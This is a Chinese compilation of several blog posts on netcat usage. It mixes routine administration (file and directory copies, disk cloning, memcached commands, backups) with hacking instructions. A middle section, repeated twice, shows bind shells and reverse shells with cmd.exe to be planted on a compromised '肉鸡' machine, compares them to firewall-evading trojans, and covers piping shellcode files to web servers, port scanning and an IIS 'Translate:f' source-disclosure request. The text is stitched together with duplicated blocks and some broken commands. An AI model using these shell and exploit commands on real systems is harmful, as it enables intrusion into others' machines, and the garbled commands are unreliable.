nc命令总结

1、远程拷贝文件
从server1拷贝文件到server2上。需要先在server2上，用nc激活监听，server2上运行：

引用

[root@hatest2 tmp]# nc -l 1234 > install.log
server1上运行：

引用

[root@hatest1 ~]# ll install.log
-rw-r–r–   1 root root 39693 12月 20   2007 install.log
[root@hatest1 ~]# nc -w 1 192.168.228.222 1234 < install.log
2、克隆硬盘或分区
操作与上面的拷贝是雷同的，只需要由dd获得硬盘或分区的数据，然后传输即可。
克隆硬盘或分区的操作，不应在已经mount的的系统上进行。所以，需要使用安装光盘引导后，进入拯救模式（或使用Knoppix工 具光盘）启动系统后，在server2上进行类似的监听动作：

# nc -l 1234 | dd of=/dev/sda

server1上执行传输，即可完成从server1克隆sda硬盘到server2的任务：

# dd if=/dev/sda | nc 192.168.228.222 1234

※ 完成上述工作的前提，是需要落实光盘的拯救模式支持服务器上的网卡，并正确配置IP。

3、端口扫描
可以执行：

引用

# nc -v -w 1 192.168.228.222 -z 1-1000
hatest2 [192.168.228.222] 22 (ssh) open
4、保存Web页面

# while true; do nc -l -p 80 -q 1 < somepage.html; done

5、模拟HTTP Headers

引用

[root@hatest1 ~]# nc www.huanxiangwu.com 80
GET / HTTP/1.1
Host: ispconfig.org
Referrer: mypage.com
User-Agent: my-browser

HTTP/1.1 200 OK
Date: Tue, 16 Dec 2008 07:23:24 GMT
Server: Apache/2.2.6 (Unix) DAV/2 mod_mono/1.2.1 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.2 Perl/v5.8.8
Set-Cookie: PHPSESSID=bbadorbvie1gn037iih6lrdg50; path=/
Expires: 0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Set-Cookie: oWn_sid=xRutAY; expires=Tue, 23-Dec-2008 07:23:24 GMT; path=/
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html
[......]
在nc命令后，输入红色部分的内容，然后按两次回车，即可从对方获得HTTP Headers内容。

6、聊天
nc还可以作为简单的字符下聊天工具使用，同样的，server2上需要启动监听：

[root@hatest2 tmp]# nc -lp 1234

server1上传输：

[root@hatest1 ~]# nc 192.168.228.222 1234

这样，双方就可以相互交流了。使用Ctrl+D正常退出。

7、传输目录
从server1拷贝nginx-0.6.34目录内容到server2上。需要先在server2上，用nc激活监听，server2上运行：

引用

[root@hatest2 tmp]# nc -l 1234 |tar xzvf -
server1上运行：

引用

[root@hatest1 ~]# ll -d nginx-0.6.34
drwxr-xr-x 8 1000 1000 4096 12-23 17:25 nginx-0.6.34
[root@hatest1 ~]# tar czvf – nginx-0.6.34|nc 192.168.228.222 1234
8、参数简介
这仅是一个1.10版本的简单说明，详细的参数使用还是需要看man：

引用

想要连接到某处: nc [-options] hostname port[s] [ports] …
绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
参数:
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-h 帮助信息
-i secs 延时的间隔
-l 监听模式，用于入站连接
-n 指定数字的IP地址，不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 任意指定本地及远程端口
-s addr 本地源地址
-u UDP模式
-v 详细输出——用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉——用于扫描时，其中端口号可以指定一个或者用lo-hi式的指定范围。

9.用nc命令操作memcached

1）存储数据：printf “set key 0 10 6 result ” |nc 192.168.2.34 11211
2）获取数据：printf “get key ” |nc 192.168.2.34 11211
3）删除数据：printf “delete key ” |nc 192.168.2.34 11211
4）查看状态：printf “stats ” |nc 192.168.2.34 11211
5）模拟top命令查看状态：watch “echo stats” |nc 192.168.2.34 11211
6）清空缓存：printf “flush_all ” |nc 192.168.2.34 11211 (小心操作，清空了缓存就没了

 

 

 

 

 

 

 

nc命令详解
netcat被誉为网络安全界的‘瑞士军刀’，相信没有什么人不认识它吧……
一个简单而有用的工具，透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具，
能够直接由其它程序和脚本轻松驱动。同时，它也是一个功能强大的网络调试和探测工具，能够建立你需要的几
乎所有类型的网络连接，还有几个很有意思的内置功能(详情请看下面的使用方法)。
在中国，它的WINDOWS版有两个版本，一个是原创者Chris Wysopal写的原版本，另一个是由‘红与黑’编译
后的新‘浓缩’版。‘浓缩’版的主程序只有10多KB（10多KB的NC是不能完成下面所说的第4、第5种使用方法，
有此功能的原版NC好象要60KB：P），虽然”体积”小，但很完成很多工作。 
一、基本使用
想要连接到某处: nc [-options] hostname port[s] [ports] …
绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
参数:
-e prog 程序重定向，一旦连接，就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-h 帮助信息
-i secs 延时的间隔
-l 监听模式，用于入站连接
-n 指定数字的IP地址，不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 任意指定本地及远程端口
-s addr 本地源地址
-u UDP模式
-v 详细输出——用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉——用于扫描时
其中端口号可以指定一个或者用lo-hi式的指定范围。
例如：扫描端口
tcp扫描
C:nc>nc -v -z -w2 192.168.0.80 1-140
net [192.168.0.80] 140 (?)
net [192.168.0.80] 139 (netbios-ssn) open
net [192.168.0.80] 138 (?)
net [192.168.0.80] 137 (netbios-ns)
net [192.168.0.80] 136 (?)
net [192.168.0.80] 135 (epmap) open
net [192.168.0.80] 81 (?) open
net [192.168.0.80] 80 (http) open
net [192.168.0.80] 79 (finger)
net [192.168.0.80] 25 (smtp) open
net [192.168.0.80] 24 (?)
net [192.168.0.80] 23 (telnet)
net [192.168.0.80] 21 (ftp)
udp扫描
C:nc>nc -u -v -z -w2 192.168.0.80 1-140
net [192.168.0.80] 140 (?) open
net [192.168.0.80] 139 (?) open
net [192.168.0.80] 138 (netbios-dgm) open
net [192.168.0.80] 137 (netbios-ns) open
net [192.168.0.80] 54 (?) open
net [192.168.0.80] 53 (domain) open
net [192.168.0.80] 38 (?) open
net [192.168.0.80] 37 (time) open
net [192.168.0.80] 7 (echo) open
二、高级应用
1.IE的MIME欺骗
这个网站目录提供了黑客的n关，过了这n关证明你开始入门了。我做的
http://www.try2hack.nl
的国产版。
这个页面告诉我们的浏览器不是 IE6.72,我们的*作系统不是LIUNX,我们不是从
www.microsoft.com/ms.htm
重定向链接过去的，linux有 IE6.72? 微软会在它的页面上放
http://www.try2hack.nl/cgi-bin/level7.pl
的链接？
nc 221.10.222.34 80
GET /level/level7.php HTTP/1.1 
Accept:image/gif,image/x-xbitmap,application/msword,*/* 
Referer:http://www.microsoft.com/ms.htm 
Accept-Language:zh-cn 
Accept-Encodeing:gzip,deflate 
User-Agent:Mozilla/4.0 (compatible;MSIE6.72;Linux i686) 
Host:221.10.222.34 
Connection:Keep-Alive 
2.IIS 5 “Translate:f” 显示代码脆弱点
Translate:f脆弱点的机制：发送一个畸形的HTTP GET 请求给服务器方一个可执行脚本或相关文件类型（例如.ASP或者global.asa）。这些文件是用于服务器上运行的，绝不会到客户机上去，而这个请求就会导致IIS将这种文件的内容发送到远端的客户机上，而不是在服务器上运行。这种畸形的HTTP GET请求的关键特性是该请求的末尾有一个特定的头信息Translate:f，并有一个反斜杠””附于URL之后。下面就有这样的一个例子（[CRLF]代表回车字符）
注意 GET global.asa 后的反斜杠以及Translate:f头信息。
GET /global.asa HTTP/1.0
Host:192.168.0.1
User-Agent:SensePostData
Content-Type:application/x-www-form-urlencoded
Translate:f
[CRLF]
[CRLF]
将以上内容保存在一个文本文件中（例如example.txt）
然后向一个有这个漏洞的服务器发送
c:>type example.txt | nc –nvv 192.168.0.80 80
(UNKNOWN) [192.168.0.80] 80 (?) open
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 Dec 2002 08:50:46 GMT
Content-Type: application/octet-stream
Content-Length: 2790
ETag: “0448299fcd6df1:bea”
Last-Modified: Wed, 13 Nov 2002 18:50:46 GMT
Accept-Ranges: bytes
Cache-Control: no-cache
举例：
1)连接到REMOTE主机，例子：
格式：nc -nvv 192.168.x.x 80
讲解：连到192.168.x.x的TCP80端口
2)监听LOCAL主机，例子：
格式：nc -l -p 80
讲解：监听本机的TCP80端口
3)扫描远程主机，例子：
格式：nc -nvv -w2 -z 192.168.x.x 80-445
讲解：扫描192.168.x.x的TCP80到TCP445的所有端口
4)REMOTE主机绑定SHELL，例子：
格式：nc -l -p 5354 -t -e c:winntsystem32cmd.exe
讲解：绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
5)REMOTE主机绑定SHELL并反向连接，例子：
格式：nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354
讲解：绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口
以上为最基本的几种用法（其实NC的用法还有很多，
当配合管道命令”|”与重定向命令”“等等命令功能更强大……）。
=====================================================================================================
高级用法：
6)作攻击程序用，例子：
格式1：type.exe c:exploit.txt|nc -nvv 192.168.x.x 80
格式2：nc -nvv 192.168.x.x 80  c:log.txt
讲解：使用’-L’可以不停地监听某一个端口，直到ctrl+c为止，同时把结果输出到’c:log.txt’中，如果把‘>’
改为‘>>’即可以追加日志
附：’c:log.txt’为日志等
9)作蜜罐用[3]，例子：
格式1：nc -L -p 80  e:log.dat
nc -l -v -p port
参数解释：
-l：监听端口，监听入站信息
-p：后跟本地端口号
-v：显示端口的信息，如果使用-vv的话，则会显示端口更详细的信息
提示：一般大家都爱用-vv
nc -l -p 80
这个很简单，监听80端口
如果机器上运行这个命令，端口80被认为是开放的，可以欺骗很多扫描器的哦！
nc -l -p 80 > e:log.dat
呵呵，功能和上边一样，但是后边加了个“> e:log.dat”我想，学过ECHO
那个命令的人都会知道吧，是在E盘创建一个log.dat的日志文件
nc -l -v -p 80
和上边命令相似，不过这次不是记录在文件里，而是会直接显示在运行着NC
的屏幕上。
呵呵，讲了这么多，来实践下
nc -l -v -p 80
然后在浏览器中输入本机IP：127.0.0.1
呵呵，看到什么？
同样，上边两个也是一样，大家自己试验一下吧
命令2：程序定向
nc -l -p port -t -e cmd.exe
本地机： nc -l -p port 或 nc -l -v -p port
目标机：nc -e cmd.exe ip port
参数解释：
-l、-p两个参数已经解释过了
-e；作用就是程序定向
-t：以telnet的形式来应答
例子
nc -l -p 5277 -t -e cmd.exe
知道运行在哪里吗？千万不要运行在自己的机器上，如果运行了，你机器
就会变成一台TELNET的服务器了，呵呵，解释一下：监听本地端口5277的
入站信息，同时将CMD.exe这个程序，重定向到端口5277上，当有人连接的时候，就让程序CMD.exe以TELNET的形式来响应连接要求。
说白了，其实就是让他成为一台TELNET的肉鸡，所以这个命令要运行在你的肉鸡上。。（话外音：说这么多遍当我们白痴啊，快往下讲！！！）
呵呵，咱们来找台肉鸡试试，我TELNET IP 5277
HOHO~~如何？
local machine：nc -l -p port ( or nc -l -v -p port )
remote machine：nc -e cmd.exe ip port
大家知道灰鸽子和神偷吧，这两款工具都是利用了反弹端口型的木马，
什么叫反弹端口？就是说，当对方中马后，不用你主动和对方连接，也就是说
不用从你的client端向对方主机上运行的server端发送请求连接，而是对方主动来连接你
这样就可以使很多防火墙失效，因为很多防火墙都不检查出站请求的。
这里这两个命令结合在一起后，于那两款木马可以说有异曲同工之效。为什么？
咳！！听我给你讲啊！！（先交100000000RMB学费)哇，别杀我啊！！)
nc -l -p 5277 （坚听本地5277端口）
同样也可以用
nc -l -v -p 5277
运行在本地
然后在远程机器上，想办法运行
nc -e cmd.exe ip 5277
（你可别真的打“ip”在肉机上啊）要打，xxx.xxx.xxx.xxx这样！！
呵呵，看看在本地机器上出现了什么？
这样就是反弹~~在本地机器上得到了一个SHELL
命令3：扫描端口
nc -v ip port
nc -v -z ip port-port
nc -v -z -u ip port-port
参数解释：
-z：将输入输出关掉，在扫描时使用
nc -v ip port
这个命令是针对某一个端口进行扫描
例如：
nc -v ip 135
扫描远程主机的135端口，这样获得了该端口的一些简单信息，但是针对某些端口，我们还可以获得更多的信息
例如：80端口
我们可以使用nc -v ip 80 然后使用get方法来获得对方的WEB服务器的信息
nc -v -z ip port-port
这个命令是用来扫描的一个命令，这个命令用于快速扫描TCP端口，而port-port则是指定了扫描的端口范围
例如：
nc -v -z ip 1-200
可以看到我机器上的1-200的TCP端口的开放情况
nc -v -z -u ip port-port
这个命令比上个命令多了个-u，这个命令的作用仍然是扫描端口，只是多了一个-u的参数，是用来扫UDP端口的
例如：
nc -v -z -u ip 1-200
这个命令就会扫1-200的UDP端口
命令4：传送文件（HOHO，I LIKE）
LOCAL MACHINE：nc -v -n ip port  y:svr.exe
参数解释：
-n：指定数字的IP地址
这两个命令结合起来是用来传送文件的
首先，在远程机上运行命令：
nc -v -l -p 5277 > c:pulist.exe
这个命令还记的吗？呵呵，是不是和监听命令有点类似，对，没错，这个是监听5277端口
并把接受到的信息数据写到c:pulist.exe中
这时候在本地机上运行
nc -v -n ip 5277

 

 

 

 

nc命令详解
Linuxshell社区门户

netcat被誉为网络安全界的‘瑞士军刀’，相信没有什么人不认识它吧……
一个简单而有用的工具，透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具，
能够直接由其它程序和脚本轻松驱动。同时，它也是一个功能强大的网络调试和探测工具，能够建立你需要的几
乎所有类型的网络连接，还有几个很有意思的内置功能(详情请看下面的使用方法)。
nc命令详解
Filed under: security — ranbo @ 9:08 pm
netcat被誉为网络安全界的‘瑞士军刀’，相信没有什么人不认识它吧……
一个简单而有用的工具，透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具，
能够直接由其它程序和脚本轻松驱动。同时，它也是一个功能强大的网络调试和探测工具，能够建立你需要的几
乎所有类型的网络连接，还有几个很有意思的内置功能(详情请看下面的使用方法)。
在中国，它的WINDOWS版有两个版本，一个是原创者Chris Wysopal写的原版本，另一个是由‘红与黑’编译
后的新‘浓缩’版。‘浓缩’版的主程序只有10多KB（10多KB的NC是不能完成下面所说的第4、第5种使用方法，
有此功能的原版NC好象要60KB：P），虽然”体积”小，但很完成很多工作。
一、基本使用
想要连接到某处: nc [-options] hostname port[s] [ports] …
绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
参数:
-e prog 程序重定向，一旦连接，就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-h 帮助信息
-i secs 延时的间隔
-l 监听模式，用于入站连接
-n 指定数字的IP地址，不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 任意指定本地及远程端口
-s addr 本地源地址
-u UDP模式
-v 详细输出——用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉——用于扫描时
其中端口号可以指定一个或者用lo-hi式的指定范围。
例如：扫描端口
tcp扫描
C:nc>nc -v -z -w2 192.168.0.80 1-140
net [192.168.0.80] 140 (?)
net [192.168.0.80] 139 (netbios-ssn) open
net [192.168.0.80] 138 (?)
net [192.168.0.80] 137 (netbios-ns)
net [192.168.0.80] 136 (?)
net [192.168.0.80] 135 (epmap) open
net [192.168.0.80] 81 (?) open
net [192.168.0.80] 80 (http) open
net [192.168.0.80] 79 (finger)
net [192.168.0.80] 25 (smtp) open
net [192.168.0.80] 24 (?)
net [192.168.0.80] 23 (telnet)
net [192.168.0.80] 21 (ftp)
udp扫描
C:nc>nc -u -v -z -w2 192.168.0.80 1-140
net [192.168.0.80] 140 (?) open
net [192.168.0.80] 139 (?) open
net [192.168.0.80] 138 (netbios-dgm) open
net [192.168.0.80] 137 (netbios-ns) open
net [192.168.0.80] 54 (?) open
net [192.168.0.80] 53 (domain) open
net [192.168.0.80] 38 (?) open
net [192.168.0.80] 37 (time) open
net [192.168.0.80] 7 (echo) open
二、高级应用
1.IE的MIME欺骗
这个网站目录提供了黑客的n关，过了这n关证明你开始入门了。我做的
http://www.try2hack.nl
的国产版。
这个页面告诉我们的浏览器不是 IE6.72,我们的*作系统不是LIUNX,我们不是从
www.microsoft.com/ms.htm
重定向链接过去的，linux有 IE6.72? 微软会在它的页面上放
http://www.try2hack.nl/cgi-bin/level7.pl
的链接？
nc 221.10.222.34 80
GET /level/level7.php HTTP/1.1
Accept:image/gif,image/x-xbitmap,application/msword,*/*
Referer:http://www.microsoft.com/ms.htm
Accept-Language:zh-cn
Accept-Encodeing:gzip,deflate
User-Agent:Mozilla/4.0 (compatible;MSIE6.72;Linux i686)
Host:221.10.222.34
Connection:Keep-Alive
2.IIS 5 “Translate:f” 显示代码脆弱点
Translate:f脆弱点的机制：发送一个畸形的HTTP GET 请求给服务器方一个可执行脚本或相关文件类型（例如.ASP或者global.asa）。这些文件是用于服务器上运行的，绝不会到客户机上去，而这个请求就会导致IIS将这种文件的内容发送到远端的客户机上，而不是在服务器上运行。这种畸形的HTTP GET请求的关键特性是该请求的末尾有一个特定的头信息Translate:f，并有一个反斜杠””附于URL之后。下面就有这样的一个例子（[CRLF]代表回车字符）
注意 GET global.asa 后的反斜杠以及Translate:f头信息。
GET /global.asa HTTP/1.0
Host:192.168.0.1
User-Agent:SensePostData
Content-Type:application/x-www-form-urlencoded
Translate:f
[CRLF]
[CRLF]
将以上内容保存在一个文本文件中（例如example.txt）
然后向一个有这个漏洞的服务器发送
c:>type example.txt | nc –nvv 192.168.0.80 80
(UNKNOWN) [192.168.0.80] 80 (?) open
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 Dec 2002 08:50:46 GMT
Content-Type: application/octet-stream
Content-Length: 2790
ETag: “0448299fcd6df1:bea”
Last-Modified: Wed, 13 Nov 2002 18:50:46 GMT
Accept-Ranges: bytes
Cache-Control: no-cache
举例：
1)连接到REMOTE主机，例子：
格式：nc -nvv 192.168.x.x 80
讲解：连到192.168.x.x的TCP80端口
2)监听LOCAL主机，例子：
格式：nc -l -p 80
讲解：监听本机的TCP80端口
3)扫描远程主机，例子：
格式：nc -nvv -w2 -z 192.168.x.x 80-445
讲解：扫描192.168.x.x的TCP80到TCP445的所有端口
4)REMOTE主机绑定SHELL，例子：
格式：nc -l -p 5354 -t -e c:winntsystem32cmd.exe
讲解：绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
5)REMOTE主机绑定SHELL并反向连接，例子：
格式：nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354
讲解：绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口
以上为最基本的几种用法（其实NC的用法还有很多，
当配合管道命令”|”与重定向命令”“等等命令功能更强大……）。
=====================================================================================================
高级用法：
6)作攻击程序用，例子：
格式1：type.exe c:exploit.txt|nc -nvv 192.168.x.x 80
格式2：nc -nvv 192.168.x.x 80  c:log.txt
讲解：使用’-L’可以不停地监听某一个端口，直到ctrl+c为止，同时把结果输出到’c:log.txt’中，如果把‘>’
改为‘>>’即可以追加日志
附：’c:log.txt’为日志等
9)作蜜罐用[3]，例子：
格式1：nc -L -p 80  e:log.dat
nc -l -v -p port
参数解释：
-l：监听端口，监听入站信息
-p：后跟本地端口号
-v：显示端口的信息，如果使用-vv的话，则会显示端口更详细的信息
提示：一般大家都爱用-vv
nc -l -p 80
这个很简单，监听80端口
如果机器上运行这个命令，端口80被认为是开放的，可以欺骗很多扫描器的哦！
nc -l -p 80 > e:log.dat
呵呵，功能和上边一样，但是后边加了个“> e:log.dat”我想，学过ECHO
那个命令的人都会知道吧，是在E盘创建一个log.dat的日志文件
nc -l -v -p 80
和上边命令相似，不过这次不是记录在文件里，而是会直接显示在运行着NC
的屏幕上。
呵呵，讲了这么多，来实践下
nc -l -v -p 80
然后在浏览器中输入本机IP：127.0.0.1
呵呵，看到什么？
同样，上边两个也是一样，大家自己试验一下吧
命令2：程序定向
nc -l -p port -t -e cmd.exe
本地机： nc -l -p port 或 nc -l -v -p port
目标机：nc -e cmd.exe ip port
参数解释：
-l、-p两个参数已经解释过了
-e；作用就是程序定向
-t：以telnet的形式来应答
例子
nc -l -p 5277 -t -e cmd.exe
知道运行在哪里吗？千万不要运行在自己的机器上，如果运行了，你机器
就会变成一台TELNET的服务器了，呵呵，解释一下：监听本地端口5277的
入站信息，同时将CMD.exe这个程序，重定向到端口5277上，当有人连接的时候，就让程序CMD.exe以TELNET的形式来响应连接要求。
说白了，其实就是让他成为一台TELNET的肉鸡，所以这个命令要运行在你的肉鸡上。。（话外音：说这么多遍当我们白痴啊，快往下讲！！！）
呵呵，咱们来找台肉鸡试试，我TELNET IP 5277
HOHO~~如何？
local machine：nc -l -p port ( or nc -l -v -p port )
remote machine：nc -e cmd.exe ip port
大家知道灰鸽子和神偷吧，这两款工具都是利用了反弹端口型的木马，
什么叫反弹端口？就是说，当对方中马后，不用你主动和对方连接，也就是说
不用从你的client端向对方主机上运行的server端发送请求连接，而是对方主动来连接你
这样就可以使很多防火墙失效，因为很多防火墙都不检查出站请求的。
这里这两个命令结合在一起后，于那两款木马可以说有异曲同工之效。为什么？
咳！！听我给你讲啊！！（先交100000000RMB学费)哇，别杀我啊！！)
nc -l -p 5277 （坚听本地5277端口）
同样也可以用
nc -l -v -p 5277
运行在本地
然后在远程机器上，想办法运行
nc -e cmd.exe ip 5277
（你可别真的打“ip”在肉机上啊）要打，xxx.xxx.xxx.xxx这样！！
呵呵，看看在本地机器上出现了什么？
这样就是反弹~~在本地机器上得到了一个SHELL
命令3：扫描端口
nc -v ip port
nc -v -z ip port-port
nc -v -z -u ip port-port
参数解释：
-z：将输入输出关掉，在扫描时使用
nc -v ip port
这个命令是针对某一个端口进行扫描
例如：
nc -v ip 135
扫描远程主机的135端口，这样获得了该端口的一些简单信息，但是针对某些端口，我们还可以获得更多的信息
例如：80端口
我们可以使用nc -v ip 80 然后使用get方法来获得对方的WEB服务器的信息
nc -v -z ip port-port
这个命令是用来扫描的一个命令，这个命令用于快速扫描TCP端口，而port-port则是指定了扫描的端口范围
例如：
nc -v -z ip 1-200
可以看到我机器上的1-200的TCP端口的开放情况
nc -v -z -u ip port-port
这个命令比上个命令多了个-u，这个命令的作用仍然是扫描端口，只是多了一个-u的参数，是用来扫UDP端口的
例如：
nc -v -z -u ip 1-200
这个命令就会扫1-200的UDP端口
命令4：传送文件（HOHO，I LIKE）
LOCAL MACHINE：nc -v -n ip port  y:svr.exe
参数解释：
-n：指定数字的IP地址
这两个命令结合起来是用来传送文件的
首先，在远程机上运行命令：
nc -v -l -p 5277 > c:pulist.exe
这个命令还记的吗？呵呵，是不是和监听命令有点类似，对，没错，这个是监听5277端口
并把接受到的信息数据写到c:pulist.exe中
这时候在本地机上运行
nc -v -n ip 5277 

 

 nc命令简介 2009-06-13 10:58:44

分类：

nc是一款很不错的网络检测工具，以下是详细使用。
'nc.exe -h'即可看到各参数的使用方法。
基本格式：nc [-options] hostname port[s] [ports] ...
　　 nc -l -p port [options] [hostname] [port]
-d 后台模式
-e prog 程序重定向，一旦连接，就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式，用于入站连接
-L 连接关闭后,仍然继续监听
-n 指定数字的IP地址，不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 随机本地及远程端口
-s addr 本地源地址
-t 使用TELNET交互方式
-u UDP模式
-v 详细输出--用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉--用于扫描时
端口的表示方法可写为M-N的范围格式。
1)连接到远程主机
格式：nc -nvv 192.168.x.x 80
讲解：连到192.168.x.x的TCP80端口
2)监听本地主机
格式：nc -l -p 80
讲解：监听本机的TCP80端口
3)扫描远程主机
格式：nc -nvv -w2 -z 192.168.x.x 80-445
讲解：扫描192.168.x.x的TCP80到TCP445的所有端口
4)REMOTE主机绑定SHELL，例子：
格式：nc -l -p 5354 -t -e c:winntsystem32cmd.exe
讲解：绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
5)REMOTE主机绑定SHELL并反向连接，例子：
格式：nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354
讲解：绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口
以上为最基本的几种用法（其实NC的用法还有很多，
当配合管道命令"|"与重定向命令"<"、">"等等命令功能更强大......）。
6)作攻击程序用，例子：
格式1：type.exe c:exploit.txt|nc -nvv 192.168.x.x 80
格式2：nc -nvv 192.168.x.x 80 < c:exploit.txt
讲解：连接到192.168.x.x的80端口，并在其管道中发送'c:exploit.txt'的内容(两种格式确有相同的效果，真是有异曲同工之妙:P)
附：'c:exploit.txt'为shellcode等
7)作蜜罐用[1]，例子：
格式：nc -L -p 80
讲解：使用'-L'(注意L是大写)可以不停地监听某一个端口，直到ctrl+c为止
8)作蜜罐用[2]，例子：
格式：nc -L -p 80 > c:log.txt
讲解：使用'-L'可以不停地监听某一个端口，直到ctrl+c为止，同时把结果输出到'c:log.txt'中，如果把‘>'
　 改为‘>>'即可以追加日志
附：'c:log.txt'为日志等
9)作蜜罐用[3]，例子：
格式1：nc -L -p 80 < c:honeypot.txt
格式2：type.exe c:honeypot.txt|nc -L -p 80
讲解：使用'-L'可以不停地监听某一个端口，直到ctrl+c为止，并把'c:honeypot.txt'的内容‘送'入其管道中！
10)备份档案
A机的资料夹 /data备份到B主机的backup.tgz
源主机: tar czf - work|nc -l -c -p 1234
目的主机: nc 192.168.0.1 1234 >a.tgz
或
A:tar -zcf data|nc -l -p 4444
B:nc a 4444 >backup.tgz
传完后ctrl+c中断连接,这样A主机不会生成档案直接传到了backup.tgz,缺点就是不知道啥时候传完,嘿嘿

 

 

 

nc(NetCat)，在网络工具中有”瑞士军刀”的美誉，它短小精悍，功能强大，下面分享一些我平时经常用到的功能，更多的功能请google之。

1.基本参数
想要连接到某处: nc [-options] hostname port[s] [ports] …
绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
参数:
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-h 帮助信息
-i secs 延时的间隔
-l 监听模式，用于入站连接
-n 指定数字的IP地址，不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 任意指定本地及远程端口
-s addr 本地源地址
-u UDP模式
-v 详细输出——用两个
-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉——用于扫描时，其中端口号可以指定一个或者用lo-hi式的指定范围。

2.简单用法举例
1）端口扫描
# nc -v -w 2 192.168.2.34 -z 21-24
nc: connect to 192.168.2.34 port 21 (tcp) failed: Connection refused
Connection to 192.168.2.34 22 port [tcp/ssh] succeeded!
nc: connect to 192.168.2.34 port 23 (tcp) failed: Connection refused
nc: connect to 192.168.2.34 port 24 (tcp) failed: Connection refused

2)从192.168.2.33拷贝文件到192.168.2.34
在192.168.2.34上： nc -l 1234 > test.txt
在192.168.2.33上： nc 192.168.2.34 < test.txt

3)简单聊天工具
在192.168.2.34上： nc -l 1234
在192.168.2.33上： nc 192.168.2.34 1234
这样，双方就可以相互交流了。使用ctrl+C(或D）退出。

3.用nc命令操作memcached
1）存储数据：printf “set key 0 10 6 result ” |nc 192.168.2.34 11211
2）获取数据：printf “get key ” |nc 192.168.2.34 11211
3）删除数据：printf “delete key ” |nc 192.168.2.34 11211
4）查看状态：printf “stats ” |nc 192.168.2.34 11211
5）模拟top命令查看状态：watch “echo stats” |nc 192.168.2.34 11211
6）清空缓存：printf “flush_all ” |nc 192.168.2.34 11211 (小心操作，清空了缓存就没了）

4. 使用nc来传文件

发送端：   cat a.txt  |  nc -l  3333

接收端：   nc 192.168.0.3    3333 >   a.txt

或者

发送端:      cat a.txt     |   nc 192.168.0.3     9999 

接收端:      nc -l 9999 > a.txt